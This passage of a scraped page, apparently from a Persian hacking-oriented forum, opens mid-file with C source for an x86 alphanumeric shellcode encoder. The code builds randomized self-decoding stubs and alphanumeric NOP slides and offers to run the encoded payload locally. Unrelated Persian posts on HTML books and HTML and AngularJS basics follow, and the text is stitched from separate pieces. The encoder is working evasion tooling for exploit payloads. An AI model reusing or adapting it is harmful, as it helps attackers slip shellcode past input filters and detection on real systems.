| (UCHAR)*(decoder+OFFSET_PUSH_DWORD1), // | | is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD1))?"valid":"invalid - not alphanumeric!!!");// | | *(decoder+OFFSET_PUSH_DWORD2) = get_random_alnum_push_dword_opcode(); // | | printf("push dword2=0x%2X - %s\n", // | | (UCHAR)*(decoder+OFFSET_PUSH_DWORD2), // | | is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD2))?"valid":"invalid - not alphanumeric!!!");// | | *(decoder+OFFSET_PUSH_DWORD3) = get_random_alnum_push_dword_opcode(); // | | printf("push dword3=0x%2X - %s\n", // | | (UCHAR)*(decoder+OFFSET_PUSH_DWORD3), // | | is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD3))?"valid":"invalid - not alphanumeric!!!");// | | *(decoder+OFFSET_PUSH_DWORD4) = get_random_alnum_push_dword_opcode(); // | | printf("push dword4=0x%2X - %s\n", // | | (UCHAR)*(decoder+OFFSET_PUSH_DWORD4), // | | is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD4))?"valid":"invalid - not alphanumeric!!!");// | | // | | //bugfix: this time after srand() :) // | | xor_al1=get_random_alnum_value(); // | | xor_al2=get_random_alnum_value(); // | | *(decoder+OFFSET_XOR_AL1_A) = xor_al1; // | | *(decoder+OFFSET_XOR_AL1_B) = xor_al1; // | | *(decoder+OFFSET_XOR_AL2_A) = xor_al2; // | | *(decoder+OFFSET_XOR_AL2_B) = xor_al2; // | | // | | memcpy(decoder+OFFSET_RANDOMIZED_DECODER_HEAD, ////// | | randomize_decoder_head(decoder, size_decoder, xor_al1, *(decoder+offset_jne_xor1)), // <---here-------------------------|---' SIZE_RANDOMIZED_DECODER_HEAD); ////// | //set first xor1 to random alnum value (this is the first byte of the encoded data) // | xor1 = get_random_alnum_value(); // | printf("xor1=0x%2X - %s\n", // | (UCHAR)xor1, // | is_alnum((UCHAR)xor1)?"valid":"invalid - not alphanumeric!!!"); // | ///////////////////////////////////////////////////////// | RE_RUN: // | sprintf(alnum_shellcode, "%s",decoder); // | memset(temp_buf, 0, 3);/////////////////// | for(i=0; i<size; i++) // | { ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// | // each original byte is encoded into 3 alphanumeric bytes where first_byte*third_byte^second_byte==original_byte // | // third_byte is the next encoded original byte's first_byte // | // the first byte of the terminating key is the last byte's third_byte /////// | p_xor2_key=get_xor2_and_key_for_xor1_and_c(xor1, shellcode[i]);//get a list of second_byte and third_byte for first_byte// | if(!p_xor2_key) /////// | goto RE_RUN; // | p_xor2_key = choose_random_node(p_xor2_key);//choose a random combination//////////////////////////////////////////// | key=p_xor2_key->key; // | xor2=p_xor2_key->xor2; // | temp_buf[0] = xor1; // | temp_buf[1] = xor2; // | strcat(alnum_shellcode, temp_buf); // append it to our decoder // | xor1=key; // | free_p_xor2_key(p_xor2_key); // free the list // | } //get next original_byte // | //////////////////////// | if (terminating_key_exist(alnum_shellcode+sizeof(decoder), str_end_of_encoded_shellcode))// | { // | printf("error - terminating key found in encoded shellcode. running again to fix\n");// | goto RE_RUN; // | } ///////////////////////////////////////////////////// | *(UCHAR*)(alnum_shellcode+8) = key; // set the last key of the encoded data to be the first byte of the terminating string | *(UCHAR*)(alnum_shellcode+9) = get_random_alnum_value(); // choose 3 random alnum bytes for the rest of the terminating string| *(UCHAR*)(alnum_shellcode+10) = get_random_alnum_value(); // choose 3 random alnum bytes for the rest of the terminating string| *(UCHAR*)(alnum_shellcode+11) = get_random_alnum_value(); // choose 3 random alnum bytes for the rest of the terminating string| strncat(alnum_shellcode, // append the terminating string to the decoder+encoded shellcode | (UCHAR*)(alnum_shellcode+offset_terminating_key), ////////////////////////////// | 4); // | // | //bugfix: handle case of esp pointing to shellcode // | if (!strcmp(Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE), "esp")) // | { // | // _asm{ // | // push esp; // | // pop eax; // | // xor al, 0x36; // | // xor al, 0x30; // | // } // | p_alnum_shellcode = malloc(strlen(alnum_shellcode)+1+6); // | memset(p_alnum_shellcode, 0, strlen(alnum_shellcode)+1+6); // | memcpy(p_alnum_shellcode+6, alnum_shellcode, strlen(alnum_shellcode)+1); // | p_alnum_shellcode[0] = 'T'; // | p_alnum_shellcode[1] = 'X'; // todo: randomize by using other registers than eax // | p_alnum_shellcode[2] = '4'; // and using other xor values // | p_alnum_shellcode[3] = '6'; // <-- (x+6) // | p_alnum_shellcode[4] = '4'; // // | p_alnum_shellcode[5] = '0'; // <-- x // | p_alnum_shellcode[8] = get_push_register_instruction("eax"); // | p_alnum_shellcode[9] = get_push_register_instruction("eax"); // | size_decoder += 6; // | } // | // | printf("encoded shellcode length: %d\n", strlen(alnum_shellcode)-size_decoder); // | printf("decoder length: %d\n%s\n", // | size_decoder, // | p_alnum_shellcode); // | // | printf("scanning alnum_shellcode for shellcode up to size bytes\n"); // | found_msg = scan_str_known_pattern(alnum_shellcode, shellcode, size); ///////// | if (found_msg) printf("shellcode found encoded in alnum_shellcode using %s.\n", found_msg); // | else printf("shellcode not found encoded in alnum_shellcode.\n"); /////////////////////////// | // | if (str_is_alnum(alnum_shellcode)) // | { // | printf("execute shellcode locally? (hit: y and press enter): ");// | if(tolower(getchar()) == 'y') // | { ///////////// | _asm // | { // | push p_alnum_shellcode; //////// | pop REGISTER_WITH_ADDRESS_OF_SHELLCODE;// <------------------------------------------------------------------------' //jump to head of decoder // jmp REGISTER_WITH_ADDRESS_OF_SHELLCODE;// } ////////////// } // } // else // { /////////////// printf("error non-alphanumeric shellcode\n"); // } ////////////////////////////// ///////// // return 0; ////// } // /////////////////// BOOL arg1_imul_arg2_xor_arg3(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length, UINT offset1, UINT offset2, UINT offset3) { UINT offset, i, found; for (i=found=offset=0; i<known_pattern_length; i++) { while(*(alnum_str+offset)) { if((UCHAR)((alnum_str[offset+offset1]*alnum_str[offset+offset2])^alnum_str[offset+offset3])== (UCHAR)known_pattern[i]) { offset+=2; found++; break; } else if((UCHAR)((alnum_str[offset+offset1+1]*alnum_str[offset+offset2+1])^alnum_str[offset+offset3+1])== (UCHAR)known_pattern[i]) { offset+=3; found++; break; } else { found=0; i=0; offset++; } } } if(found == known_pattern_length) return 1; else return 0; } BOOL arg1_xor_arg2_imul_arg3(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length, UINT offset1, UINT offset2, UINT offset3) { UINT offset, i, found; for (i=found=offset=0; i<known_pattern_length; i++) { while(*(alnum_str+offset)) { if((UCHAR)((alnum_str[offset+offset1]^alnum_str[offset+offset2])*alnum_str[offset+offset3])== (UCHAR)known_pattern[i]) { offset+=2; found++; break; } else if((UCHAR)((alnum_str[offset+offset1+1]^alnum_str[offset+offset2+1])*alnum_str[offset+offset3+1])== (UCHAR)known_pattern[i]) { offset+=3; found++; break; } else { found=0; i=0; offset++; } } } if(found == known_pattern_length) return 1; else return 0; } BOOL arg1_imul_key_xor_arg2(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length, UCHAR key, UINT offset1, UINT offset2) { UINT offset, i, found; for (i=found=offset=0; i<known_pattern_length; i++) { while(*(alnum_str+offset)) { if((UCHAR)((alnum_str[offset+offset1]*key)^alnum_str[offset+offset2])== (UCHAR)known_pattern[i]) { offset+=2; found++; break; } else if((UCHAR)((alnum_str[offset+offset1+1]*key)^alnum_str[offset+offset2+1])== (UCHAR)known_pattern[i]) { offset+=3; found++; break; } else { found=0; i=0; offset++; } } } if(found == known_pattern_length) return 1; else return 0; } UCHAR *scan_str_known_pattern(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length) { UCHAR *alnum = malloc(strlen(ALNUM_CHARSET)+1); UCHAR *temp_buf = malloc(255); strncpy(alnum, ALNUM_CHARSET, strlen(ALNUM_CHARSET)); alnum[strlen(ALNUM_CHARSET)]=0; memset(temp_buf, 0, 255); //this is not for production, just a poc... while(*alnum) { if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, *alnum++, 0, 1)) { alnum--; strcat(temp_buf, "(buf[0]*'"); temp_buf[strlen(temp_buf)] = *alnum; strcat(temp_buf, "')^buf[1]"); return(temp_buf); } } alnum-=strlen(ALNUM_CHARSET); while(*alnum) { if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, *alnum++, 1, 0)) { alnum--; printf("key = 0x%2X ('%c')\n", *alnum, *alnum); return("found pattern using: (buf[1]*key)^buf[0]\n"); } } if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, 0x30, 0, 1)) return("(buf[0]*0x30)^buf[1]"); else if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, 0x30, 1, 0)) return("(buf[1]*0x30)^buf[0]"); else if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, 0x10, 0, 1)) return("(buf[0]*0x10)^buf[1]"); else if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, 0x10, 1, 0)) return("(buf[1]*0x10)^buf[0]"); else if (arg1_imul_arg2_xor_arg3(alnum_str, known_pattern, known_pattern_length, 0, 1, 2)) return("(buf[0]*buf[1])^buf[2]"); else if (arg1_imul_arg2_xor_arg3(alnum_str, known_pattern, known_pattern_length, 0, 2, 1)) return("(buf[0]*buf[2])^buf[1]"); else if (arg1_imul_arg2_xor_arg3(alnum_str, known_pattern, known_pattern_length, 1, 2, 0)) return("(buf[1]*buf[2])^buf[0]"); else if (arg1_xor_arg2_imul_arg3(alnum_str, known_pattern, known_pattern_length, 0, 1, 2)) return("(buf[0]^buf[1])*buf[2]"); else if (arg1_xor_arg2_imul_arg3(alnum_str, known_pattern, known_pattern_length, 0, 2, 1)) return("(buf[0]^buf[2])*buf[1]"); else if (arg1_xor_arg2_imul_arg3(alnum_str, known_pattern, known_pattern_length, 1, 2, 0)) return("(buf[1]^buf[2])*buf[0]"); else return ""; } BOOL is_alnum(UCHAR c) { char *alnum = ALNUM_CHARSET; char search_c[2] = ""; search_c[0] = c; return((BOOL)strstr(alnum, search_c)); } BOOL str_is_alnum(UCHAR *str) { ULONG length; length = strlen(str); for(;length>0;length--) { if( !is_alnum(str[length-1]) ) return 0; } return 1; } UCHAR get_two_xor_complemets_for_byte_and_xor(UCHAR byte, UCHAR xor, int index) { int xor_complement_1, xor_complement_2; UCHAR two_xor_complements[3]; for(xor_complement_1=0; xor_complement_1<MAX_BYTES; xor_complement_1++) { if (is_alnum((UCHAR)xor_complement_1)) { for(xor_complement_2=0; xor_complement_2<MAX_BYTES; xor_complement_2++) { if (is_alnum((UCHAR)xor_complement_2)) { if(byte == (xor ^ xor_complement_1 ^ xor_complement_2)) { two_xor_complements[0] = (UCHAR)xor_complement_1; two_xor_complements[1] = (UCHAR)xor_complement_2; } } } } } if(index == 0 || index == 1) return two_xor_complements[index]; else return (UCHAR)0; } BOOL terminating_key_exist(UCHAR *alnum_shellcode, UCHAR *terminating_key) { return (BOOL) strstr(alnum_shellcode, terminating_key); } DWORD ip_str_to_dw(UCHAR *str) { DWORD x[4]; int dwIpAddress; if (!str || MAX_IP_STR_LEN < strlen(str) || strlen(str) < MIN_IP_STR_LEN) return -1; sscanf(str, "%d.%d.%d.%d", &x[0],&x[1],&x[2],&x[3]); x[3] = x[3] > 255 ? -1 : (x[3] <<= 24); x[2] = x[2] > 255 ? -1 : (x[2] <<= 16); x[1] = x[1] > 255 ? -1 : (x[1] <<= 8); x[0] = x[0] > 255 ? -1 : (x[0] <<= 0); dwIpAddress = x[0]+x[1]+x[2]+x[3]; return dwIpAddress; } DWORD my_htonl(DWORD dw_in) { DWORD dw_out; *((UCHAR *)&dw_out+3) = *((UCHAR *)&dw_in+0); *((UCHAR *)&dw_out+2) = *((UCHAR *)&dw_in+1); *((UCHAR *)&dw_out+1) = *((UCHAR *)&dw_in+2); *((UCHAR *)&dw_out+0) = *((UCHAR *)&dw_in+3); return dw_out; } void free_p_xor2_key(struct xor2_key *node) { struct xor2_key *temp = 0; if(node) { temp = node->prev; while(node->next) { node=node->next; free(node->prev); } free(node); } if(temp) { while(temp->prev) { temp=temp->prev; free(temp->next); } free(temp); } } struct xor2_key *choose_random_node(struct xor2_key *head) { int num_nodes = 1, selected_node, i; struct xor2_key* tail = head; struct xor2_key* pn = NULL ; if (!head || !head->key) return 0; while(tail->next) { tail = tail->next; num_nodes++; } selected_node = rand()%num_nodes; for(i=0; i<selected_node; i++) head = head->next; return head; } struct xor2_key *get_xor2_and_key_for_xor1_and_c(UCHAR xor1, UCHAR c) { struct xor2_key *p_xor2_key, *p_xor2_key_head; char *alnum = ALNUM_CHARSET; UINT i=0, z=1, r=0, count=0; UCHAR xor2=0, x=0; p_xor2_key_head = p_xor2_key = malloc(sizeof(xor2_key)); p_xor2_key->prev = 0; p_xor2_key->next = 0; p_xor2_key->key = 0; p_xor2_key->xor2 = 0; for(i=0; alnum[i]; i++) { for(x=0; alnum[x];x++) { xor2 = alnum[x]; if (((UCHAR)(xor1 * alnum[i]) ^ xor2) == c) { p_xor2_key->xor2 = xor2; p_xor2_key->key = alnum[i]; p_xor2_key->next = malloc(sizeof(struct xor2_key)); p_xor2_key->next->prev = p_xor2_key; p_xor2_key = p_xor2_key->next; p_xor2_key->key=0; p_xor2_key->xor2=0; } } } if(!p_xor2_key->key) p_xor2_key->next = 0; if (p_xor2_key->prev) p_xor2_key = p_xor2_key->prev; else return 0; free(p_xor2_key->next); p_xor2_key->next=0; return p_xor2_key_head; } UCHAR *shuffle(UCHAR str[], UINT length) //length does not include terminating null. { UINT last, randomNum; UCHAR temporary; UCHAR *output = malloc(length); memcpy(output, str, length); for (last = length; last > 1; last--) { randomNum = rand( ) % last; temporary = output[randomNum]; output[randomNum] = output[last-1]; output[last-1] = temporary; } memcpy(str, output, length); return output; }// taken from: http://www.warebizprogramming.com/text/cpp/section6/part8.htm UCHAR *slide_substr_back(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide) { UCHAR *prefix_substr, *substr, *suffix_substr, *output_str; UINT prefix_substr_len, suffix_substr_len; if(slide > substr_offset) { printf("you can't slide it that far back!\n"); return 0; } output_str = malloc(str_len); memset(output_str, 0 , str_len); suffix_substr_len = str_len-substr_len-substr_offset; suffix_substr = malloc(suffix_substr_len); memset(suffix_substr, 0, suffix_substr_len); prefix_substr_len = substr_offset; prefix_substr = malloc(prefix_substr_len); memset(prefix_substr, 0, prefix_substr_len); substr = malloc(substr_len); memset(substr, 0, substr_len); strncpy(substr, str+substr_offset, substr_len); strncpy(prefix_substr, str, prefix_substr_len); strncpy(suffix_substr, str+substr_offset+substr_len, suffix_substr_len); strncpy(output_str, prefix_substr, prefix_substr_len-slide); strncpy(output_str+prefix_substr_len-slide, substr, substr_len); strncpy(output_str+prefix_substr_len-slide+substr_len, str+substr_offset-slide, slide); strncpy(output_str+prefix_substr_len-slide+substr_len+slide, str+substr_offset+substr_len, suffix_substr_len); free(prefix_substr); free(suffix_substr); free(substr); return output_str; } UCHAR *slide_substr_forward(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide) { UCHAR *prefix_substr, *substr, *suffix_substr, *output_str; UINT prefix_substr_len, suffix_substr_len; if(slide > str_len-substr_len-substr_offset) { printf("you can't slide it that far forward!\n"); return 0; } output_str = malloc(str_len); memset(output_str, 0 , str_len); suffix_substr_len = str_len-substr_len-substr_offset; suffix_substr = malloc(suffix_substr_len); memset(suffix_substr, 0, suffix_substr_len); prefix_substr_len = substr_offset; prefix_substr = malloc(prefix_substr_len); memset(prefix_substr, 0, prefix_substr_len); substr = malloc(substr_len); memset(substr, 0, substr_len); strncpy(substr, str+substr_offset, substr_len); strncpy(prefix_substr, str, prefix_substr_len); strncpy(suffix_substr, str+substr_offset+substr_len, suffix_substr_len); strncpy(output_str, prefix_substr, prefix_substr_len); strncpy(output_str+prefix_substr_len, suffix_substr, slide); strncpy(output_str+prefix_substr_len+slide, substr, substr_len); strncpy(output_str+prefix_substr_len+slide+substr_len, suffix_substr+slide, suffix_substr_len-slide); free(prefix_substr); free(suffix_substr); free(substr); return output_str; } UCHAR *get_nop_slide(UINT size, UINT slide) { //simple alnum nop slide generator UINT i, x, append_dec_eax = 0; UCHAR alnum_nop[][3] = { "AI", //inc ecx;dec ecx // (alnum_nop[0]) "BJ", //inc edx;dec edx // (alnum_nop[1]) "CK", //inc ebx;dec ebx // (alnum_nop[2]) "EM", //inc ebp;dec ebp // (alnum_nop[3]) "FN", //inc esi;dec esi // (alnum_nop[4]) "GO", //inc edi;dec edi // (alnum_nop[5]) [we don't care about eax value before the imul] "HG", //dec eax;inc edi // (alnum_nop[6]) --- not allowed in nop_slide_2 [instruction as it overwrites eax with result ] "HO", //dec eax;dec edi // (alnum_nop[7]) --- not allowed in nop_slide_2 [and we don't care about edi value at all. ] "DL", //inc esp;dec esp // (alnum_nop[8]) --- [todo: need to preserve stack state] >--. //we can freely inc/dec esp for now // "PX", //push eax;pop eax// (alnum_nop[9]) --- [todo: need to preserve stack state] >--| //but we need to take it into account // "QY", //push ecx;pop ecx// (alnum_nop[10]) ---[todo: need to preserve stack state] >--| //once we start pushing/poping to/from // "RZ", //push edx;pop edx// (alnum_nop[11]) ---[todo: need to preserve stack state] >--' //the stack. // | //TODO: <-----------------------------------------------------------------------------------' // push eax push eax push eax push ecx push edx // pop eax push ecx push ecx dec esp pop edx // push ecx pop ecx push edx inc esp push ecx // pop ecx pop eax inc esp pop ecx pop ecx // push edx push edx dec esp push eax push eax // pop edx pop edx pop edx inc esp pop eax // pop ecx dec esp . // pop eax pop eax . // push edx . // pop edx etc... }; UCHAR *nop_slide; nop_slide = malloc(size); memset(nop_slide, 0, size); if(size%2) { append_dec_eax = 1; size--; } for(i=0; i<(size/2); i++) { do x = rand()%(sizeof(alnum_nop)/3); while ((slide==2)&&(x==6||x==7)); strcat(nop_slide, alnum_nop[x]); } if(append_dec_eax) { strcat(nop_slide, slide==1?"H":rand()%2?"G":"O"); //dec eax or inc/dec edi - depends on which nop slide } return nop_slide; } UCHAR get_random_alnum_push_dword_opcode() { UCHAR alnum_push_dword_opcode[] = { 'P', //0x50 push eax 'Q', //0x51 push ecx 'R', //0x52 push edx 'S', //0x53 push ebx 'T', //0x54 push esp 'U', //0x55 push ebp 'V', //0x56 push esi 'W' //0x57 push edi }; return alnum_push_dword_opcode[rand()%sizeof(alnum_push_dword_opcode)]; } UCHAR get_random_alnum_value() { char alnum_values[] = ALNUM_CHARSET; return alnum_values[rand()%strlen(alnum_values)]; } UCHAR get_push_register_instruction(UCHAR *reg) { if (!strcmp(reg, "eax")) return 'P'; //0x50 push eax else if (!strcmp(reg, "ecx")) return 'Q'; //0x51 push ecx else if (!strcmp(reg, "edx")) return 'R'; //0x52 push edx else if (!strcmp(reg, "ebx")) return 'S'; //0x53 push ebx else if (!strcmp(reg, "esp")) return 'T'; //0x54 push esp else if (!strcmp(reg, "ebp")) return 'U'; //0x55 push ebp else if (!strcmp(reg, "esi")) return 'V'; //0x56 push esi else if (!strcmp(reg, "edi")) return 'W'; //0x57 push edi else return 0; } UCHAR *randomize_decoder_head(UCHAR *decoder, UINT size_decoder, UCHAR xor_al1, UCHAR jne_xor1) { UCHAR states[11] = {0,1,2,3,4,5,6,7,8,9,10}; UCHAR instructions[11][3]; UCHAR instruction_comments[11][28]; UINT i,c, state; UCHAR *output; UCHAR *random_states; UCHAR *p_state[5]; output = malloc(17); memset(output, 0, 17); memset(instructions, 0, 11*3); memset(instruction_comments, 0, 11*28); instructions[0][0] = '\x6a'; //j instructions[0][1] = xor_al1; // instructions[1][0] = '\x58'; //X instructions[2][0] = '\x34'; //4 instructions[2][1] = xor_al1; // instructions[3][0] = '\x48'; //H instructions[4][0] = '\x34'; //4 instructions[4][1] = jne_xor1; // instructions[5][0] = '\x30'; //0 instructions[5][1] = '\x42'; //B instructions[5][2] = size_decoder-1; // instructions[6][0] = '\x52'; //R instructions[7][0] = '\x52'; //R instructions[8][0] = '\x59'; //Y instructions[9][0] = '\x47'; //G instructions[10][0] = '\x43'; //C strcat(instruction_comments[0], "push XOR_AL1"); strcat(instruction_comments[1], "pop eax"); strcat(instruction_comments[2], "xor al, XOR_AL1"); strcat(instruction_comments[3], "dec eax"); strcat(instruction_comments[4], "xor al, JNE_XOR1"); strcat(instruction_comments[5], "xor byte ptr [edx+size], al"); strcat(instruction_comments[6], "push edx"); strcat(instruction_comments[7], "push edx"); strcat(instruction_comments[8], "pop ecx"); strcat(instruction_comments[9], "inc edi"); strcat(instruction_comments[10], "inc ebx"); do { memset(p_state, 0, sizeof(UCHAR*)*5); random_states = shuffle(states, 11); //.*0.*1.*2.*3.*4.*5 p_state[0] = memchr(random_states, 0, 11); if(p_state[0]) p_state[1] = memchr(p_state[0], 1, 11-(p_state[0]-random_states)); if(p_state[1]) p_state[1] = memchr(p_state[1], 2, 11-(p_state[1]-random_states)); if(p_state[1]) p_state[1] = memchr(p_state[1], 3, 11-(p_state[1]-random_states)); if(p_state[1]) p_state[1] = memchr(p_state[1], 4, 11-(p_state[1]-random_states)); if(p_state[1]) p_state[1] = memchr(p_state[1], 5, 11-(p_state[1]-random_states)); //.*[67].*8 if(p_state[1]) { p_state[2] = memchr(random_states, 6, 11); p_state[3] = memchr(p_state[2], 8, 11-(p_state[2]-random_states)); if(!p_state[3]) { p_state[2] = memchr(random_states, 7, 11); p_state[3] = memchr(p_state[2], 8, 11-(p_state[2]-random_states)); } if(p_state[3]) { //.*1.*[67].*[67] if(p_state[2] && p_state[1] < p_state[2]) p_state[4] = memchr(p_state[2], *p_state[2]==6?7:6, 11-(p_state[2]-random_states)); //.*0.*[67].*8.*1 if(!p_state[4]) p_state[4] = memchr(p_state[0], 6, 11-(p_state[0]-random_states)); if(!p_state[4]) p_state[4] = memchr(p_state[0], 7, 11-(p_state[0]-random_states)); if(p_state[4]) p_state[4] = memchr(p_state[4], 8, 11-(p_state[4]-random_states)); if(p_state[4]) p_state[4] = memchr(p_state[4], 1, 11-(p_state[4]-random_states)); //.*[67].*8.*0.*1.*[67] if(!p_state[4]) p_state[4] = memchr(p_state[3], 0, 11-(p_state[3]-random_states)); if(p_state[4]) p_state[4] = memchr(p_state[4], 1, 11-(p_state[3]-random_states)); if(p_state[4]) p_state[4] = memchr(p_state[4], *p_state[3]==6?7:6, 11-(p_state[4]-random_states)); } } } while (!p_state[4]); for (c=state=0; state<sizeof(states); state++) { i=0; while (instructions[random_states[state]][i] && i < 3) { output[c] = instructions[random_states[state]][i]; i++; c++; } } printf("======================\ndecoder head instruction order: %x %x %x %x %x %x %x %x %x %x %x\n", random_states[0], random_states[1], random_states[2], random_states[3], random_states[4], random_states[5], random_states[6], random_states[7], random_states[8], random_states[9], random_states[10] ); printf("%s\n" \ "%s\n" \ "%s\n" \ "%s\n" \ "%s\n" \ "%s\n" \ "%s\n" \ "%s\n" \ "%s\n" \ "%s\n" \ "%s\n======================\n", instruction_comments[random_states[0]], instruction_comments[random_states[1]], instruction_comments[random_states[2]], instruction_comments[random_states[3]], instruction_comments[random_states[4]], instruction_comments[random_states[5]], instruction_comments[random_states[6]], instruction_comments[random_states[7]], instruction_comments[random_states[8]], instruction_comments[random_states[9]], instruction_comments[random_states[10]]); return output; }
  20. Programming-HTML

    کتاب های برتر در اموزش html به صورت pdf رمز تمامی فایل ها(anonysec.org) (7کتاب)
  21. Programming-HTML

    HTML چیست ؟ عبارت HTML ( اچ تی ام ال ) مخفف Hyper Text Markup Language به معنی زبان نشانه گذاری فوق متن است. Html زبان استاندارد طراحی صفحات وب است و کليه کدهای صفحه اعم از طرف سرور و طرف مشتری در نهايت به کدهای HTML تبديل شده و توسط مرورگر نمايش داده می شوند. به عبارت دیگر مرورگر ها هیچکدام از کدها و کنترل های سمت سرور همچون کدهای asp و php را نمیشناسند و کد قابل فهم برای آنها اچ تی ام ال می باشد. کامپایلر های زبان های برنامه نویسی سروری در نهایت کد های خود را برای نمایش به کد اچ تی ام ال تبدیل میکنند و برای مرورگر میفرستند تا به کاربران نمایش داده شود. html یک زبان نشانه گذاری است به اين معنی که بخش های مختلف توسط اجزايی به نام تگ از هم جدا شده ، که هر کدام دارای کاربرد و خواص مربوط خود هستند . اين تگ ها به مرورگر اعلام می کنند که هر بخش از صفحه چه نوع عنصری است و بايد به چه صورت نمايش داده شود در مقاله ی تگ های Html به این موصوع به طور مفصل پرداخته شده است. در يک صفحه HTML می توان انواع عناصر از قبيل متن ، تيتر ، عکس ، جدول و ... را قرار داد ، که برای هر عنصر بايد از تگ مربوط به آن استفاده کرد . صفحات HTML فقط از کد ها که به صورت متن هستند تشکيل شده اند. بدین معنا که برای تصویر کد مربوط به تمایش تصویر و جدول و ... کدهای اچ تی ام ال مربوط به هر یک را باید نوشت و مرورگر با رسیدن به این کد ها و تگ ها ، المنت های مرتبط با آن را نمایش می دهد. هر یک از کدهای html ، معنا و مفهوم خاصی دارند و تأثیر مشخصی بر محتوا می‌گذارند. مثلاً برچسب‌هایی برای تغییر شکل ظاهری متن، نظیر درشت و ضخیم کردن یک کلمه یا برقراری پیوند به صفحات دیگر در اچ‌تی‌ام‌ال تعریف شده‌اند. یک سند اچ‌تی‌ام‌ال، یک پروندهٔ مبتنی بر متن (Text–based) است که معمولاً با پسوند .htm یا .html نام‌گذاری شده و محتویات آن از برچسب‌های اچ‌تی‌ام‌ال تشکیل می‌شود. مرورگرهای وب، که قادر به درک و تفسیر برچسب‌های اچ‌تی‌ام‌ال هستند، تک‌تک آن‌ها را از داخل سند اچ‌تی‌ام‌ال خوانده و سپس محتوای آن صفحه را نمایان‌سازی (Render) می‌کنند. اچ‌تی‌ام‌ال زبان برنامه‌نویسی نیست، بلکه زبانی برای نشانه‌گذاری ابرمتن است و اساساً برای ساخت‌مند کردن اطلاعات و جدایش اجزای منطقی یک نوشتار — نظیر عناوین ، تصاویر ، فهرست‌ها ، بندها و جداول — به کار می‌رود. از سوی دیگر، اچ تی ام ال را نباید به عنوان زبانی برای صفحه‌آرایی یا نقاشی صفحات وب به کار بُرد
  22. Programming-HTML

    مقدمه آموزش HTML آموزش HTML (اچ تی ام ال) - مقدمه HTML (اچ تی ام ال) با استفاده از این آموزش، می توانید وب سایتتان را خودتان طراحی کنید. در این خود آموز، مطالبی را در مورد HTML (اچ تی ام ال) آموزش خواهید دید. یاد گیری HTML (اچ تی ام ال) کار آسانی است و از آموزش آن لذت خواهید برد. آموزش HTML (اچ تی ام ال) همراه با صدها مثال در این خودآموز، برای آموزش HTML از صدها مثال استفاده شده است. به کمک ویرایشگری که در اختیارتان است، می توانید سند HTML را ویرایش کنید و با کلیک روی یک دکمه، نتیجه را مشاهده کنید. مثال (مقدمه آموزش HTML) <html> <body> <h1>My First Heading</h1> <p>My first paragraph.</p> </body> </html> HTML چیست؟ HTML یک زبان برای توصیف صفحات وب است. HTML بترتیب سرنام واژگان Hyper Text Markup Language بحساب می آید. (زبان علامت گذاری ابر متن) HTML یک زبان برنامه نویسی نیست بلکه زبان علامت گذاری است. یک زبان علامت گذاری مجموعه ای از تگ ها می باشد. HTML از تگ ها برای توصیف صفحات وب استفاده می کند. آموزش تگ های HTML تگ های HTML، کلید واژه هایی هستند که داخل علامت کوچکتر بزرگتر هستند. مثل <HTML> تگ های HTML معمولا به صورت جفت می آیند. تگ اول همان تگ شروع می باشد و تگ دوم نیز همان تگ پایان است. تگ های شروع و پایان، تگ باز و بسته نیز نامیده می شود. سند HTML = صفحات وب سندهای HTML صفحات وب را توصیف می کنند. سندهای HTML شامل تگ های HTML (اچ تی ام ال) و متن ساده می باشد. سندهای HTML صفحات وب نیز نامیده می شود. هدف یک مرورگر وب (مانند internet explorer یا firefox) این است که سندهای HTML را خوانده و آنها را به صورت صفحات وب نمایش دهد. مرورگر، تگ های HTML را نمایش نمی دهد، اما از تگ های HTML استفاده می کند تا محتوای صفحه را تفسیر کند. مثال: <html> <body> <h1>My First Heading</h1> <p>My first paragraph.</p> </body> </html> توضیح مثال: متن بین <html> و <html/> صفحه وب را توضیح می دهد. متن بین <body> و <body/> محتوای قابل نمایش صفحه است. متن بین <h1> و <h1/> برای نمایش یک عنوان استفاده می شود. متن بین <p> و <p/> برای نمایش یک پاراگراف استفاده می شود.
  23. Programming-HTML

    آموزش انگولار- آموزش AngularJS AngularJS بر پایه ی HTML به همراه خصوصیت های جدید استوار است. AngularJS یک زبان تمام عیار برای اپلیکیشن های تک صفحه ای می باشد. آموزش AngularJS بسیار ساده می باشد. هم اکنون آموزش AngularJS را شروع نمایید! کاربرد این آموزش ها این آموزش ها به طور ویژه طراحی شده اند تا به شما کمک کنند که AngularJS را به سرعت فراگیرید. ابتدا شما مبانی انگولار را فرا خواهید گرفت از قبیل: دستورات(directives) و عبارات(expressions) و فیلترها(filters) و ماژول ها(modules) و کنترل کننده ها(controllers) . سپس شما هرآنچه را که لازم است درباره ی انگولار بدانید را فرا خواهید گرفت، مانند: رویدادها(events) و DOM و فرم ها(Forms) و ورودی ها(input) و اعتبار سنجی(validation) و Http و ... . مثال های خودتان امتحان کنید در هر فصل در هر فصل، شما می توانید مثال ها را به طور آنلاین ویرایش کنید و با کلیک بر روی یک دکمه، نتیجه را ببینید. مثالی از انگولار <!DOCTYPE html> <html lang="en-US"> <script src="http://ajax.googleapis.com/ajax/libs/angularjs/1.3.14/angular.min.js"></script> <body> <div ng-app=""> <p>Name : <input type="text" ng-model="name"></p> <h1>Hello {{name}}</h1> </div> </body> </html> آنچه که باید از قبل بدانید قبل از اینکه شروع به آموزش انگولار نمایید شما بایستی یک دانش ابتدایی از موارد زیر داشته باشید: HTML CSS JavaScript تاریخچه ی انگولار ورژن 